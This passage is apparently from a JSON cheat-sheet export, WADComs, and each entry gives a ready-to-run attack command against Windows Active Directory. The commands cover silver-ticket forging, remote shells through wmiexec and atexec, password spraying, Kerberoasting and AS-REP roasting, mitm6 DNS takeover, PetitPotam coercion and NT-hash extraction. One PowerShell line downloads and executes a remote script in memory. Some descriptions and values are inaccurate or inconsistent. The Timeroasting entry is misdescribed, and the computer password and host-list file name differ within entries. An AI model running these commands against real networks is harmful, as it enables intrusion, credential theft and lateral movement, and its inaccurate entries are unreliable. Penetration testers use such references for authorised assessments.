ticketer.py can perform Silver Ticket attacks, which crafts a valid TGS ticket for a specific service using a valid user's NTLM hash. It is then possible to gain access to that service. The following command crafts a TGS for the SMB service, which can then be used to gain a shell.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: b18b4b218eccad1c223306ea1916885f\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tSMB Service: cifs\n","mitre":[],"requires":["Username","Hash"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"]},{"id":"wadcoms:Impacket-WMIExec","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-WMIExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 wmiexec.py test.local/john:password123@10.10.10.1","description":"Impacket's wmiexec.py uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["WMI"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#wmiexecpy"]},{"id":"wadcoms:Impacket-addcomputer-LDAPS","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-addcomputer-LDAPS","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 addcomputer.py -method LDAPS -dc-ip 10.10.10.1 -computer-pass TestPassword321 -computer-name testComputer test.local/john:password123","description":"Impacket's addcomputer.py will add a computer account to the domain and set its password. The following command will create a new computer over LDAPS. Plain LDAP is not supported, as it doesn't allow setting the password of the new computer.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tNew Computer Password: TestPassword123\n\n\tNew Computer Name: testComputer\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"]},{"id":"wadcoms:Impacket-addcomputer-SMB","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-addcomputer-SMB","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 addcomputer.py -method SAMR -dc-ip 10.10.10.1 -computer-pass TestPassword321 -computer-name testComputer test.local/john:password123","description":"Impacket's addcomputer.py will add a computer account to the domain and set its password. The following command will create a new computer over the SMB by specifying the `SAMR` method.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tNew Computer Password: TestPassword123\n\n\tNew Computer Name: testComputer\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"]},{"id":"wadcoms:Impacket-atexec-Creds","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-atexec-Creds","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 atexec.py test.local/john:password123@10.10.10.1 whoami","description":"Impacket's atexec.py uses the Task Scheduler service on the remote Windows host to execute the given command. It will create a windows task with a random name, trigger the task, and then delete it. The following command executes `whoami` on the remote Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCommand Executed: whoami\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py","https://u0041.co/blog/post/1"]},{"id":"wadcoms:Impacket-atexec-Hash","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-atexec-Hash","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 test.local/john@10.10.10.1 whoami","description":"Impacket's atexec.py uses the Task Scheduler service on the remote Windows host to execute the given command. It will create a windows task with a random name, trigger the task, and then delete it. The following command executes `whoami` on the remote Windows host, authenticating with the hash of user `john`.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76\n\n\tCommand Executed: whoami\n","mitre":[],"requires":["Hash","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py","https://u0041.co/blog/post/1"]},{"id":"wadcoms:Impacket-getST-Creds","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-getST-Creds","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation","Persistence"],"nativeCategory":["Exploitation","PrivEsc","Persistence"],"command":"python3 getST.py -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123","description":"Impacket's getST.py will request a Service Ticket and save it as ccache. If the account has constrained delegation privileges, you can use the `-impersonate` flag to request a ticket on behalf of another user. The following command will impersonate the Administrator account and request a Service Ticket on its behalf for the `www` service on host `server01.test.local`.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tService: www\n\n\tHost Name: server01.test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tImpersonated User: Administrator\n","mitre":[],"requires":["Username","Password"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"]},{"id":"wadcoms:Impacket-getST-Hash","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-getST-Hash","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation","Persistence"],"nativeCategory":["Exploitation","PrivEsc","Persistence"],"command":"python3 getST.py -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john","description":"Impacket's getST.py will request a Service Ticket and save it as ccache. If the account has constrained delegation privileges, you can use the `-impersonate` flag to request a ticket on behalf of another user. The following command will impersonate the Administrator account using the hashed password of user `john` and request a Service Ticket on its behalf for the `www` service on host `server01.test.local`.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tService: www\n\n\tHost Name: server01.test.local\n\n\tUsername: john\n\n\tHash: :2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tImpersonated User: Administrator\n","mitre":[],"requires":["Hash","Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"]},{"id":"wadcoms:Impacket-getTGT","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-getTGT","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 getTGT.py test.local/john -dc-ip 10.10.10.1 -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7","description":"Impacket's getTGT.py uses a valid user's NTLM hash to request Kerberos tickets, in order to access any service or machine where that user has permissions.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n","mitre":[],"requires":["Hash","Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getTGT.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"]},{"id":"wadcoms:Kerbrute-BruteForce","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-BruteForce","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"cat credentials.txt | kerbrute_linux_amd64 -d test.local bruteforce -","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to brute force valid username and passwords logins given a list of credentials (in the format `username:password`).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tCredential List: credentials.txt\n","mitre":[],"requires":["No_Creds"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"]},{"id":"wadcoms:Kerbrute-BruteUser","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-BruteUser","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"kerbrute bruteuser -d test.local passwords.txt john","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will bruteforce an account against a list of provided passwords given a username.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tPassword List: passwords.txt\n\n\tUsername: john\n","mitre":[],"requires":["Username"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"]},{"id":"wadcoms:Kerbrute-PasswordSpray","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-PasswordSpray","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"kerbrute passwordspray -d test.local domain_users.txt password123","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will perform a password spray account against a list of provided users given a password.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername List: domain_users.txt\n\n\tPassword: password123\n","mitre":[],"requires":["Username"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"]},{"id":"wadcoms:Kerbrute-UserEnum","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-UserEnum","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"kerbrute userenum -d test.local usernames.txt","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to enumerate valid usernames given a list of usernames to try.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n","mitre":[],"requires":["No_Creds"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"]},{"id":"wadcoms:LDAPSearch-Creds","toolId":"wadcoms:LDAPSearch","toolName":"LDAPSearch","name":"LDAPSearch-Creds","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"ldapsearch -h test.local -D 'ldap@test.local' -w password123 -b 'dc=test,dc=local'","description":"ldapsearch is a Linux based tool that opens a connection to an LDAP server, binds, and performs a search using specified parameters. The following command will attempt to find sensitive information (such as leaked creds), by querying all LDAP objects, essentially dumping all the data that an anonymous user can access.\n\nCommand Reference:\n\n\tDomain: test.local\n \n\tUsername: ldap\n \n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://linux.die.net/man/1/ldapsearch"]},{"id":"wadcoms:LDAPSearch-NoCreds","toolId":"wadcoms:LDAPSearch","toolName":"LDAPSearch","name":"LDAPSearch-NoCreds","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"ldapsearch -LLL -x -H ldap://test.local -b'' -s base '(objectclass=\\*)'","description":"ldapsearch is a Linux based tool that opens a connection to an LDAP server, binds, and performs a search using specified parameters. The following command will attempt to find sensitive information (such as leaked creds), by querying all LDAP objects, essentially dumping all the data that an anonymous user can access.\n\nCommand Reference:\n\n\tDomain: test.local\n","mitre":[],"requires":["No_Creds"],"services":["LDAP"],"references":["https://linux.die.net/man/1/ldapsearch"]},{"id":"wadcoms:Mitm6","toolId":"wadcoms:Mitm6","toolName":"Mitm6","name":"Mitm6","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"mitm6 -d test.local --ignore-nofqnd","description":"mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server. It does this by replying to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attackers host as default DNS server. The following command will respond to DHCPv6 messages and set the DNS server to the attack host IP. Leverage this command with ntlmrelayx.py to capture the WPAD configuration requests. \n\nCommand Reference:\n\n\tDomain: test.local\n","mitre":[],"requires":["No_Creds"],"services":["DNS"],"references":["https://github.com/dirkjanm/mitm6","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"]},{"id":"wadcoms:NetExec-Creds-coerce_plus","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Creds-coerce_plus","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery","Execution"],"nativeCategory":["Enumeration","Privilidge Escalation","Exploitation","Laterl movement"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M coerce_plus","description":"\"NetExec (a.k.a nxc) is a network pentesting suite that has many modules that can be listed via nxc <protocol> -L. The coerece_plus module will enumarate a target ip, dnsname, list of targets or ip range for different coherence attacks. It will indicate in the output which a target is vulnrable to. Providing you also a means for exploit by adding where your listener/reciving system is(-LISTENER=10.10.10.1) and which exploit you want it to use. The module was recently updated 7 days ago to work on the latest windows build\"\n\n Command Reference:\n\n Target IP: 10.10.10.1\n\n Username: john\n\n Password: password123 \n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://blog.redteam-pentesting.de/2025/windows-coercion/","https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/scan-for-vulnerabilities"]},{"id":"wadcoms:NetExec-Enum-LDAP","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-LDAP","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"nxc ldap 10.10.10.1 -u 'john' -p 'password123' --trusted-for-delegation --password-not-required --admin-count --users --groups","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate domain groups, local groups, users, user descriptions, users trusted for delegation, users without a password, You can also use CIDR notation to target a range of ip addresses (i.e. 10.10.10.0/24).\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-Enum-SMB-Anonymous","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"nxc smb 10.10.10.1 -u 'a' -p ''","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate the SMB host using anonymous access. \n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-Enum-SMB-Null","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB-Null","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"nxc smb 10.10.10.1 -u '' -p ''","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate the SMB host using a null session. \n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-Enum-SMB-Relay-List","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB-Relay-List","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"nxc smb smb_host.txt --gen-relay-list output.txt","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. The following command will enumerate a list of SMB hosts with signing not enforced, allowing you to relay credentials to them using ntlmrelayx.py.\n\nCommand Reference:\n\n\tSMB Hosts: smb_hosts.txt\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-Enum-SMB","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"nxc smb 10.10.10.1 -u 'john' -p 'password123' --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate domain groups, local groups, logged on users, relative identifiers (RIDs), sessions, domain users, SMB shares/permissions, and get the domain password policy. You can also use CIDR notation to target a range of ip addresses (i.e. 10.10.10.0/24).\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-Exec-SMB","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Exec-SMB","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"nxc smb 10.10.10.1 -u 'john' -p 'password123' -X '$Host'","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will execute a powershell command on the target machine if the user has Administrator privileges. using \"-x\" will execute from cmd.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-LDAP-ASREPRoasting","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-ASREPRoasting","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access","AS-REP Roasting"],"command":"nxc ldap 10.10.10.1 -u users.txt -p '' --asreproast output.txt","description":"NetExec (formerly CrackMapExec) performs an AS-REP Roasting attack via the LDAP service.\nThis command attempts to enumerate domain accounts that do not require pre-authentication \nand requests Kerberos AS-REP responses for them. The extracted encrypted ticket-granting \nticket (TGT) hashes are saved into the specified file and can later be cracked offline \nto recover plaintext credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\tDomain: test.local\n\tUsername List: users.txt\n\tPassword: (empty string)\n\tOutput File: output.txt\n","mitre":["T1558.004"],"requires":["Username","Hash"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://attack.mitre.org/techniques/T1558/004/"]},{"id":"wadcoms:NetExec-LDAP-Kerberoasting","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-Kerberoasting","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access","Kerberoasting"],"command":"nxc ldap 10.10.10.1 -u 'john' -p 'password123' --kerberoasting output.txt","description":"NetExec (formerly CrackMapExec) performs a Kerberoasting attack via the LDAP service.\nThis command authenticates with the given domain account, enumerates Service Principal Name (SPN) accounts, \nand extracts their Kerberos ticket hashes, saving them into the specified file.\nThe obtained hashes can later be cracked offline using brute force or wordlists.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\tDomain: test.local\n\tUsername: john\n\tPassword: password123\n\tOutput File: output.txt\n","mitre":["T1558.003"],"requires":["Username","Password","Hash"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast","https://attack.mitre.org/techniques/T1558/003/"]},{"id":"wadcoms:NetExec-SMB-Password-Spray","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-Password-Spray","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"nxc smb 10.10.10.1 -u users.txt -p password123","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will perform password spraying over SMB against the domain controller.\n\nCommand Reference:\n\n\tDomain Controller IP: 10.10.10.1\n\n\tUsername List: users.txt\n\n\tPassword: password123\n","mitre":[],"requires":["Username"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-SMB-Timeroasting","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-Timeroasting","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access","Timeroasting"],"command":"nxc smb 10.10.10.1 -M timeroast","description":"NetExec (formerly CrackMapExec) performs a Timeroasting attack via the SMB service.\nThis command targets the remote Windows host and abuses the Kerberos protocol by \nmanipulating ticket lifetimes or requesting renewable service tickets. \nIt can help attackers obtain long-lived Kerberos tickets for offline cracking \nor later lateral movement.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\tModule: timeroast\n","mitre":[],"requires":["Hash","Username"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://cybersecurity.bureauveritas.com/blog/timeroasting-attacking-trust-accounts-in-active-directory"]},{"id":"wadcoms:Nmap-Krb5-Enum-Users","toolId":"wadcoms:Nmap","toolName":"Nmap","name":"Nmap-Krb5-Enum-Users","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='test.local',userdb=usernames.txt 10.10.10.1","description":"Nmap's `krb5-enum-users` script attempts to bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to enumerate valid usernames given a list of usernames to try.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n","mitre":[],"requires":["No_Creds"],"services":["Kerberos","Enumeration"],"references":["https://nmap.org/download.html","https://nmap.org/nsedoc/scripts/krb5-enum-users.html"]},{"id":"wadcoms:PKINIT-getnthash","toolId":"wadcoms:PKINIT","toolName":"PKINIT","name":"PKINIT-getnthash","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"KRB5CCNAME=out.ccache python3 getnthash.py test.local/DC01\\$ -key 6e63333c372d7fbe64dab63f36673d0cd03bfb92b2a6c96e70070be7cb07f773","description":"PKINIT getnthash.py request a TGS for yourself using Kerberos U2U. This will include with the PAC which in turn contains the NT hash that you can decrypt with the AS-REP key that you got from your TGT request using gettgtpkinit.py from PKINIT. Use the TGT from gettgtpkinit.py in your KRB5CCNAME env variable.\n\nCommand Reference:\n\n Domain: test.local\n\n Host that you got the TGT from: DC01\n\n TGT from gettgtpkinit.py: out.ccache\n\n AS-REP key: 6e63333c372d7fbe64dab63f36673d0cd03bfb92b2a6c96e70070be7cb07f773\n","mitre":[],"requires":["TGT"],"services":["Kerberos"],"references":["https://github.com/dirkjanm/PKINITtools","https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/"]},{"id":"wadcoms:PKINIT-gettgtpkinit","toolId":"wadcoms:PKINIT","toolName":"PKINIT","name":"PKINIT-gettgtpkinit","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"python3 gettgtpkinit.py test.local/DC01\\$ -cert-pfx crt.pfx -pfx-pass password123 out.ccache","description":"PKINIT gettgtpkinit.py request a TGT using a PFX file, either as file or as base64 encoded blob, or PEM files for cert+key. This uses Kerberos PKINIT and will output a TGT into the specified ccache. It will also print the AS-REP encryption key which you may need for the getnthash.py tool.\n\nCommand Reference:\n\n Domain: test.local\n\n Host that you got the certificate from: DC01\n\n PFX file: crt.pfx\n\n PFX file password: password123\n\n TGT requested: out.ccache\n","mitre":[],"requires":["Username","Password","PFX"],"services":["Kerberos"],"references":["https://github.com/dirkjanm/PKINITtools","https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/"]},{"id":"wadcoms:PSADmodule-Kerbaroasting","toolId":"wadcoms:PSADmodule","toolName":"PSADmodule","name":"PSADmodule-Kerbaroasting","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Get-ADUser -Filter {ServicePrincipalName -ne \"$null\" -and Enabled -eq $true} -Properties ServicePrincipalName | select -ExpandProperty ServicePrincipalName | % { $spn = $_; Add-Type -AssemblyName System.IdentityModel; $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn; $ticketBytes = $ticket.GetRequest(); $ticketBase64 = [System.Convert]::ToBase64String($ticketBytes); $account = (Get-ADUser -Filter {ServicePrincipalName -eq $spn} -Properties SamAccountName).SamAccountName; Write-Output \"===== $account : $spn =====`n$ticketBase64\" } | Out-File -FilePath \"kerberos_tickets.txt\" -Encoding ASCII","description":"Kerberoasting is the act of requesting service tickes for accounts that have an SPN set, and then attempting to crack those hashes offline. \nThis one liner using the powershell AD module serves less as a feasiable attack and more as a PoC that the AD module with some ingenuity\ncan be used to exploit many vectors within AD that you otherwise import tools that are not signed, need obfiscation, require AV/EDR bypass or other\nsteps that may trigger alerts.\n","mitre":[],"requires":["powershell"],"services":["Kerberos"],"references":["https://github.com/samratashok/ADModule"]},{"id":"wadcoms:PetitPotam","toolId":"wadcoms:PetitPotam","toolName":"PetitPotam","name":"PetitPotam","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 PetitPotam.py -d test.local -u john -p password123 10.10.10.2 10.10.10.1","description":"PetitPotam leverages the MS-EFSRPC API to connect to a Windows host, hijack the authentication session, and trigger an authentication from the target host to an attacker controlled host (usually SMB or HTTP server). This captured authentication can then be relayed to authenticate to other hosts and perform more attacks. See more in ntlmrelayx.py.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC","NTLM"],"references":["https://github.com/topotam/PetitPotam","https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory"]},{"id":"wadcoms:Powershell-ADModule-enum","toolId":"wadcoms:Powershell","toolName":"Powershell","name":"Powershell-ADModule-enum","source":"WADComs","platform":["Windows"],"capability":["Discovery","Credential Access"],"nativeCategory":["Discovery","Credential Access"],"command":"iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory","description":"The Active Directory Module from powershell can be used to preform most needed enumaration tasks as well as some exploitation tasks revoling around ACL/DACL/Delegation abuse. The modules does not need to be installed on the target, it is signed by microsoft and thus greatly reduces the risk of detection and lastly works without restriction in constrained language mode(CLM). This entry focused on downloading and importing it in memory for a given session, one liners can be found in other entries of WADCOMs\n","mitre":[],"references":["https://docs.microsoft.com/en-us/powershell/module/activedirectory/","https://github.com/samratashok/ADModule","https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.html"]},{"id":"wadcoms:PwshADmodule-DelegationAttack-Enum","toolId":"wadcoms:PwshADmodule","toolName":"PwshADmodule","name":"PwshADmodule-DelegationAttack-Enum","source":"WADComs","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"# 1. Unconstrained (turned on for all Domain controllers by default)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Server $_ | select Name,DNSHostName; Get-ADUser -Filter {TrustedForDelegation -eq $true} -Server $_ | select Name,SamAccountName }\n\n\n# 2. Constrained (with protocol transition check)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter {msDS-AllowedToDelegateTo -like \"*\"} -Properties msDS-AllowedToDelegateTo,TrustedToAuthForDelegation -Server $_ | select Name,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo; Get-ADUser -Filter {msDS-AllowedToDelegateTo -like \"*\"} -Properties msDS-AllowedToDelegateTo,TrustedToAuthForDelegation -Server $_ | select Name,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo }\n\n# 3. RBCD (which object is already configured)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity -Server $_ | ? 